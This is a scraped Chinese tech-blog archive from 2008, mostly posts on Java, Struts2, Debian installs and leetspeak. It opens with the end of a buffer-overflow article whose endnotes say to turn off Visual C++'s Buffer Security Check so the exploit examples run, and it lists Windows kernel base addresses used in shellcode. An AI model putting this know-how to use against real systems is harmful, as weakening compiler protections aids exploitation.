[6] http://harmony.haxors.com/kungfoo
[7] http://www.research.avayalabs.com/project/libsafe/
[8] http://www.securewave.com/products/securestack/secure_stack.html

Endnotes:

{1} In practice, certain code-optimizing compilers may operate without pushing EBP on the stack. The Visual C++ 7 Compiler uses it as a default option. To deactivate it, set: Project Properties | C/C++ | Optimization | Omit Frame Pointer for NO.

{2} Microsoft has introduced a buffer overrun security tool in its Visual C++ 7. If you are intending to use the above examples to run in this environment, ensure that this option is not selected before compilation: Project Properties | C/C++ | Code Generation | Buffer Security Check should have the value NO.

--
Blog: www.b0rder.com

-- Border

『GFW』 Wikimedia 项目和 Blogspot 解封

borderj@gmail.com (Border) — Tue, 01 Apr 2008 08:31:00 +0000

从 solidot.org 看到消息除了中文 Wikipedia 以外的所有 Wikimedia 项目和 Blogspot 已经可以在中国访问。

希望这次不要想前两次没有几天又封了，虽然今天是愚人节。。。

参考：http://internet.solidot.org/internet/08/04/01/0639229.shtml

--
Blog: www.b0rder.com

-- Border

在Struts2中设置Session和用户IP

borderj@gmail.com (Border) — Mon, 31 Mar 2008 09:35:00 +0000

在Struts2中设置Session和用户IP

1. Session
Map attibutes = ActionContext.getContext().getSession();
通过Map的put和get来设置或取得Session。

2. HttpServletRequest
HttpServletRequest request = ServletActionContext.getRequest();
 
3. HttpServletResponse
HttpServletResponse response = ServletActionContext.getResponse();

参考：
http://struts.apache.org/2.0.11/docs/how-do-we-get-access-to-the-session.html
http://struts.apache.org/2.0.11/docs/how-can-we-access-the-httpservletrequest.html
http://struts.apache.org/2.0.11/docs/how-can-we-access-the-httpservletresponse.html

--
Blog: www.b0rder.cn

Border

『Linux 』Install Vim7.1 on Debian

borderj@gmail.com (Border) — Mon, 24 Mar 2008 03:08:00 +0000

1. Down vim7.1
root@bvcomforge:~/tools# wget ftp://ftp.vim.org/pub/vim/unix/vim-7.1.tar.bz2

2. root@bvcomforge:~/tools# tar xf vim-7.1.tar.bz2

3. root@bvcomforge:~/tools/vim71# ./configure
checking for tgetent in -lcurses... no
no terminal library found
checking for tgetent()... configure: error: NOT FOUND!
You need to install a terminal library; for example ncurses.
Or specify the name of the library with --with-tlib.

4. root@bvcomforge:~/tools/vim71# apt-cache search ncurses dev
libncurses5-dev - Developer's libraries and docs for ncurses

5. root@bvcomforge:~/tools/vim71# apt-get install libncurses5-dev
6. root@bvcomforge:~/tools/vim71# ./configure
7. root@bvcomforge:~/tools/vim71# make
8. root@bvcomforge:~/tools/vim71# make install

--
Blog: www.borderj.cn

Border

『Hack』 1337 the language of hackers

borderj@gmail.com (Border) — Sat, 22 Mar 2008 12:15:00 +0000

当你打开http://www.google.com/intl/xx-hacker/ 时，

你会看到google的页面居然全部是乱码？？？？

n0rM4L s34rCh    Im4635    6r00pZ    d1r3c70rY

   4DV4NC3D 534RC|-|
  PR3F3R3N(3Z
  £4|\|6µ463 700|5

4|| 480u7 Google - Google.com in English
M4k3 Google Y0ur |-|0m3p463!

你一定看不懂！但是Monyer和我的黑客兄弟们却是各个都懂的，因为这个就是传说中的黑客语言！让Monyer先给你翻译一遍！
normal search images groups directory

  advanced search
  preferences
  language tools

all about google - google.com in english
make google your homepage

那么你一定纳闷我是这么知道翻译的呢？其实很简单：1337（leet）语言一共分两个加密阶段，一个是初级加密阶段，它仅仅会把某些英文字母进行替换，替换规则如下：

0 1 3 4 5 6 7 |
o l e a s g t i

于是譬如Monyer就会被写成M0ny3r.其实你会发现它就是一种简单的象形字母，但是这么写会有什么好处呢？大家知道在暴力破解中，一般的黑客字典是一定会藏有"root""admin""god"之类的密码的，因为特别是在国外，有很多人都在用这种密码。如果暴力破解来，成功率应该会达到很大。但是如果你用骇客语进行形容的话就会变成"r007""4dm|n""60d"，这样如果是依靠字典的暴力破解基本上不会猜到，但是如果是穷举式的暴力破解依然会猜解到，于是高级的加密阶段可以来解决这个问题：

譬如MONYER被加密成/\/\0/\/`/3|2，原来的6个字符被加密成了13个字符，而且由大量的特殊字符组成，这样的13位密码的短期的暴力破解可能性几乎为0。

所以黑客语的第一个用途是加密密码（并且这个密码你是完全可以用大脑记住的）

下面是一种通用的二级加密方式，大家可以参考一下：

A = @	U = \|_\|
B = \|3	V = \/
C = (	W = \/\/
D = \|)	X = )(
E = 3	Y = '/
F = \|=	Z = 2
G = 6	a = 4
H = \|-\|	b = 8
I = \|	c = ©
J = _\|	d = \|>
K = \|(	e = 3
L = \|_	f = #
M = /\/\	g = 9
N = /\/	h = h
O = 0	i = \|
P = \|*	j = j
Q = 0,	k = \|<
R = \|2	l = 1
S = $	m = m
T = 7	n = n
o = 0	programs = progz
p = \|*	god = r00t
q = 0.	fool = f00
r = ®	heart/love = <3
s = 5	what's up = sup
t = +	that = dat
u = 00	look at = peep
v = \/	kill = frag
w = \/\/	sweet = schweet
x = ><	sleep = reboot
y = j	greater than = >
z = 2	newbie = n00b
at = @	no = noes
ck = x0r	woo hoo = w00t
the = teh	why = y
you = j00 or u	be = b
own = pwn	are = r
dude = d00d	fear = ph34r
and = &	super = uber
blah/me = meh	yo = j0
rock = r0xx0r	hacker = h4x0r
cool = k3wl	software = warez
computer = pu73r	chick = chix0r
good = teh win	bad = teh lose
loser = l4m3r	aol = uh, 14m3r
money = monies	bye = bai
kick = punt	porn = pr0n
skill = m4d 5killz	hello = ping
robot = b0t	naked = n3k3d
what = wut	whatever = wutev
cool = c00	to/two = 2
with = wit	sex = cyb3r

你上搜索引擎查h4ck3r可能不会特别多，但是如果你查h4x0r就会发现有很多，而且有很多人来用它做用户名之类。

所以黑客语的第二个用途是进行用户注册（有时h4x0r甚至会比hacker这个帐号更能表现你的价值）

你的电脑中过expl0rer.exe或者是exp1orer.exe病毒吗？其实原来你可能会想到这些病毒制作者非常有创意，连这个都能想到（也有朋友在我一眼就能看出这个伪装时感到惊讶！），其实如果你知道骇客语你就会一眼就看出来这个伪装，并且不会因此去崇拜病毒制作者的高明伪装

所以黑客语的第三个用途是进行伪装欺骗（vol的黑客加密为\/01、\/ol、vo1、v0l等等，你都能看出来么？）

其实即使我讲了这么多，你依然不要妄自尊大地认为你已经学会了黑客语。事实上直到现在，Monyer尚没有完全掌握黑客语的精华部分——加密

我们来看看1337手册里的一些例子：

english: i didn't really care for that movie.

leet: dat dot mov wuz teh lose!

english: wow, i won.

leet: omgz (oh my godz) lolz!! i pwned j00r @$$!

english: i am learning how to become an elite hacker.

leet: i 4/\/\ 134|2/\/i/\/9 |-|0\/\/ 2 83c0m3 4 1337 h4x0r, roffle-mayo.

english: sigh, what in the world is that supposed to be?

leet: *sighs* wtf (what the f---) b dat f00?

english: i'm tired.

leet: i'm 80u7 2 m4k3 1ik3 ie (internet explorer) & cr45h. /m3h y4wn5

你会发现一切都不是那么简单的，呵呵。这里Monyer仅仅是带领大家入门，更深入的就不讲了

所以黑客语的第四个用途是加密以及黑客内部交流（|>0 u un|>3r574n|> ?\/\/007!）

Monyer本人亦没有对黑客语有更多的了解，因此仅说这些，以后有了更深入的了解我再加上，在这里仅仅给大家提供一种学习的思路，献丑了。

后记：

1337 is the language of hackers and newbies across the internet. Also, the words in 1337 are usually short(ie "are" becomes "r") and intentionally spelt wrong(ie "the" becomes "teh", this is most common with e switching places and o's becoming p's).

1337 is the language in which numbers and symbols are put together to look like letters. Some people create their own 1337 letters and it makes them look more 1337 by fellow 1337-speakers. Here is an alphabet of 1337 letters I know and have created:

A: 4 or l\ or ^ or @ or /\ or /-\
B. l3 or 8 or ? or ]3 or l:
C: ( or < or ? or ￠
D: l) or l> or ])
E:3 or ￡
F: l= or # or ?
G:6 or 9
H: # or l-l or (-) or !-! or }-{ or }{ or l+l or )+( or !+! or }+{
L: 1 or ! or ][
J: _l or _/
K: l< or l( or l{ or l<=
L: l_ or ! or 1
M: l\/l or /\/\ or l\l\ or ^^
N: l/l or /\/
O: 0 or () or <> or * or ? or or
P: l* or l> or |D or l^ or l+
Q:& or (\) or ?
R: l2 or ?
S: 5 or $ or
T:+ or 7
U: l_l or /_/
V: \/
W:|/\| or \/\/ or |/\/ or \/\|
X: >< or }{ or :-:
Y: ￥
Z: 2

()/\/\9 7^l+l+ 15 73)-( 1337 #l\:-:<>l2 1 +()l_l> _/<>* ^l3l_l+ /\/\3}-{ #1213l/ll>!!!1!!11!1!! )+(3 |D\l\/l/l2.

translation:Oh my god that is the leet hacker I told you about my friend! He owns.

Common mispellings:
the = teh
that = taht
take = taek
own = pwn
you = joo
dude = jood

common phonetic replacements(always used in true 1337):
f = ph
ck == xx

*there is no 'F' in true 1337, it is replaced by the 'ph' phonetic in true 1337

**acceptable when not replaced by a symbol_|00 |2 4/\/ |_||\|1337 (_)83|2 |-|4><><0|2

Translation: You are an unleet uber hacker

参考：
1. 在线翻译 http://home.no.net/hellshl/main/translate.html
2. ph4nt0m https://groups.google.com/group/ph4nt0m
3. https://groups.google.com/group/ph4nt0m/browse_thread/thread/325a9b8681b3f12b/b49febe7f62c6894?lnk=gst&q=1337#b49febe7f62c6894

--
Blog: www.borderj.cn

Border

『Java』通过 JavaScript 和 Applet 判断 JRE 的版本

borderj@gmail.com (Border) — Fri, 21 Mar 2008 08:36:00 +0000

在网页上嵌套Applet，客户端要浏览就必须按照JRE，我们可以通过 JavaScript 和 Applet 判断 JRE 的版本，并要求客户端去下载最新的JRE。

1. 在网页中嵌套Applet。

通过HtmlConverter.exe 把上面的代码转换为：

 classid = "clsid:CAFEEFAC-0016-0000-0000-ABCDEFFEDCBA"
 codebase = "http://java.sun.com/update/1.6.0/jinstall-1_6_0-windows-i586.cab#Version=6,0,0,86"
 WIDTH = "0" HEIGHT = "0" NAME = "myApplet" >







 type = "application/x-java-applet;jpi-version=1.6" \
 CODE = "DetectPluginApplet" \
 NAME = "myApplet" \
 WIDTH = "0" \
 HEIGHT = "0"
 scriptable = false
 pluginspage = "http://java.sun.com/products/plugin/index.html#download">
 



要注意的是由于我使用的是javac 1.6.0-beta2，存在一个bug，也就是通过HtmlConverter转换的codebase 的地址不存在，我们要手动修改。
codebase = "http://java.sun.com/update/1.6.0/jinstall-1_6_0-windows-i586.cab#Version=6,0,0,86" 为
codebase = "http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab"

你要是其他版本的可以参考：http://java.sun.com/javase/6/docs/technotes/guides/deployment/deployment-guide/autodl-files.html

2. javaScript 调用 applet
document.myApplet; 就可以javaScript 调用 applet

3. applet.htm



 Detect Java Runtime






 Check Java Plugin

 classid = "clsid:CAFEEFAC-0016-0000-0000-ABCDEFFEDCBA"
 codebase = "http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab"
 WIDTH = "0" HEIGHT = "0" NAME = "myApplet" >








 type = "application/x-java-applet;jpi-version=1.6" \
 CODE = "DetectPluginApplet" \
 NAME = "myApplet" \
 WIDTH = "400" \
 HEIGHT = "320"
 scriptable = false
 pluginspage = "http://java.sun.com/products/plugin/index.html#download">
 








4. DetectPluginApplet.java

import java.awt.*;
public class DetectPluginApplet extends java.applet.Applet
{
 public void init()
 {
 add(new Label("DetectPluginApplet"));
 }
 public String getJavaVersion()
 {
 return System.getProperty("java.version");
 }
}

参考：
1. http://www.cjsdn.net/post/view?bid=1&id=27072&tpg=1&ppg=1&sty=1&age=0
2. http://java.sun.com/javase/6/docs/technotes/guides/javaws/developersguide/launch.html
3. http://java.sun.com/javase/6/docs/technotes/guides/deployment/deployment-guide/autodl-files.html

--
Blog: www.borderj.cn

Border

『Java 』通过Java Socket 实现 Http Post Get 支持 HTTP/1.0 和 HTTP/1.1

borderj@gmail.com (Border) — Sun, 16 Mar 2008 13:19:00 +0000

通过Socket实现Http的Post Get, 如果采用HTTP/1.1在访问的时候必须增加：
Host: 127.0.0.1:8080，也就是说在请求的时候必须增加服务器名。

package com.border.net;

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.net.Socket;

public class SendPost {

    /**
     * 通过Socket实现Http的Post Get
     *
     * HTTP/1.1 必须增加：Host: 127.0.0.1:8080
     *
     * @author border
     * @Http://www.borderj.cn
     * @since 2008.03.16
     *
     */
    public static void main(String[] args) {
        sendHttpPostSocket();
        httpGetSocket();
    }


    public static void sendHttpPostSocket() {
        try {
            System.out.println("Start sendPostSocket");

            // Construct data
            String data = "Test String";

            // Create a socket to the host
            String hostname = "127.0.0.1";
            int port = 8080;
            Socket socket = new Socket(hostname, port);

            // Send header
            String path = "/Ccit/servlet/SMSlet";
            BufferedWriter wr = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream(), "UTF8"));
            wr.write("POST "+ path +" HTTP/1.1\n");

            // HTTP/1.1 requires requests to include a Host header
            wr.write("Host: 127.0.0.1:8080\n");

            wr.write("Content-Length: "+ data.length() +"\n");
            wr.write("Content-Type: application/x-www-form-urlencoded\n");
            wr.write("\r\n");

            // Send data
            wr.write(data);
            wr.flush();

            System.out.println("Post Send Succeed");

            // Get response
            BufferedReader rd = new BufferedReader(new InputStreamReader(socket.getInputStream()));
            String line;
            while ((line = rd.readLine()) != null) {
                System.out.println(line);
            }
            wr.close();
            rd.close();

            System.out.println("End sendPostSocket");
        } catch (Exception e) {
            System.out.println("Error: " + e.getMessage());
            e.printStackTrace();
        }
    }

    public static void httpGetSocket() {
        try {
            System.out.println("Start httpGetSocket");

            // Create a socket to the host
            String hostname = "127.0.0.1";
            int port = 8080;
            Socket socket = new Socket(hostname, port);

            boolean autoflush = true;

            PrintWriter out   = new PrintWriter( socket.getOutputStream(), autoflush );

//          send an HTTP request to the web server
            out.println("GET /index.jsp HTTP/1.1");

            //HTTP/1.1 requires requests to include a Host header
            out.println("Host: 127.0.0.1:8080");
            out.println();

            // Get response
            BufferedReader rd = new BufferedReader(new InputStreamReader(socket.getInputStream()));
            String line;
            while ((line = rd.readLine()) != null) {
                System.out.println(line);
            }
            rd.close();

            System.out.println("End httpGetSocket");
        } catch (Exception e) {
            System.out.println("Error: " + e.getMessage());
            e.printStackTrace();
        }
    }
}

--
Blog: www.borderj.cn

Border

Struts2的返回值放到DIV中( putting result of a STRUTS 2 action into a DIV)

borderj@gmail.com (Border) — Wed, 27 Feb 2008 13:05:00 +0000

Struts2的返回值放到DIV中

1. DojoHello.jsp

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@taglib prefix="s" uri="/struts-tags"%>


 Dojo Hello World !










2. struts.xml

 /HelloWorld.jsp


3. HelloWorld.java

package demo;

import java.text.DateFormat;
import java.util.Date;

import com.opensymphony.xwork2.ActionSupport;

public class HelloWorld extends ActionSupport {

 private String message;

 public String getMessage() {
 return message;
 }

 public String execute() {
 message = "Hello World, Now is " + DateFormat.getInstance().format(new Date());
 return SUCCESS;
 }
}

参考：http://dojotoolkit.org/forum/dojo-0-4-x-legacy/dojo-0-4-x-support/putting-result-struts-2-action-div

--
Blog: www.borderj.cn

Border

Install python2.5.1 on Debian

borderj@gmail.com (Border) — Sat, 26 Jan 2008 10:45:00 +0000

Install python2.5.1 on Debian

1. Down python2.5.1 from python.org
    Python-2.5.1# wget http://www.python.org/ftp/python/2.5.1/Python-2.5.1.tgz

2. Install build environment
    Python-2.5.1# apt-get install build-essential

3. Install python
    Python-2.5.1# tar zxvf Python-2.5.1.tgz
    Python-2.5.1# cd Python-2.5.1
    Python-2.5.1# ./configure
    Python-2.5.1# make
    Python-2.5.1# make install

4. cd /usr/bin
   ln -s /usr/locale/bin/python2.5 python

5. Good luck!

--
Blog: www.borderj.cn

Border

Windows Platform	Kernel Base Address
Win95	0xBFF70000
Win98	0xBFF70000
WinME	0xBFF60000
WinNT (Service Pack 4 and 5)	0x77F00000
Win2000	0x77F00000

Border's English Blog

Efficient C Tips

[ SNMP ] Develop NetSnmp Extending agent

vim 括号自动补全

用 NET-SNMP 软件包开发简单客户端代理( Agent-mib)

英文学习资料ESLPod.com

ESL Podcast 筆記: English Cafe #84

ESL Podcast 筆記: 266 - Making a Move on Someone

中国开始管制三鹿毒奶粉负面报导

中国开始管制三鹿毒奶粉负面报导

伊利雪條含三聚氰胺需回收

伊利雪條含三聚氰胺需回收

三鹿的文件下来了，五毛们，准备出发！ - Free talk ! - 热衷八卦事业的兴趣小组

三鹿的文件下来了，五毛们，准备出发！

三鹿奶粉事件的命门

[Django] Console logging

[GAE] Google App Engine 的文档制作为CHM

免费注册CN域名

『 Google 』Google App Engine add domain b0rder.com

『Google 』 App Engine static file bug on windows

『Google 』 收到 App Engine 邀请

『 Hacking 』如何编写自己的缓冲区溢出利用程序 Linux Buffer Overflow

『Hacking』 Analysis of Buffer Overflow Attacks

Process Memory

What is the stack used for?

Function calls

How does the stack operate?

The threat

Stack overrun

Stock-based and non-stack based exploits

System function calling

Other ways of defining the beginning of the buffer

Where does the risk lie?

Preventing buffer overflow attacks

Summary

References

『GFW』 Wikimedia 项目和 Blogspot 解封

在Struts2中设置Session和用户IP

『Linux 』Install Vim7.1 on Debian

『Hack』 1337 the language of hackers

『Java』 通过 JavaScript 和 Applet 判断 JRE 的版本

『Java 』 通过Java Socket 实现 Http Post Get 支持 HTTP/1.0 和 HTTP/1.1

Struts2的返回值放到DIV中( putting result of a STRUTS 2 action into a DIV)

Install python2.5.1 on Debian

『Google 』收到 App Engine 邀请

『Java』通过 JavaScript 和 Applet 判断 JRE 的版本

『Java 』通过Java Socket 实现 Http Post Get 支持 HTTP/1.0 和 HTTP/1.1